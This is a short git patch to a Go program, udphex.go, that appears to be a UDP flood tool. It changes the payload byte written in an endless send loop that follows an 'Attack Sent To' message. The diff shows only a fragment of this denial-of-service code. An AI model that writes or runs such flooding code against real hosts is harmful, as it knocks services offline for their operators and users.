From 1d54bc962def3d59efc05224b7de1d6bc97bbede Mon Sep 17 00:00:00 2001 From: Fijxu Date: Tue, 12 Oct 2021 12:29:24 -0300 Subject: [PATCH] Update udphex.go --- udphex.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/udphex.go b/udphex.go index f69f9a1..bed659b 100644 --- a/udphex.go +++ b/udphex.go @@ -15,7 +15,7 @@ func main() { } else { fmt.Println("Attack Sent To " + target + ":" + port) for { - conn.Write([]byte("\x61\x73\x64")) + conn.Write([]byte("\x31")) } } }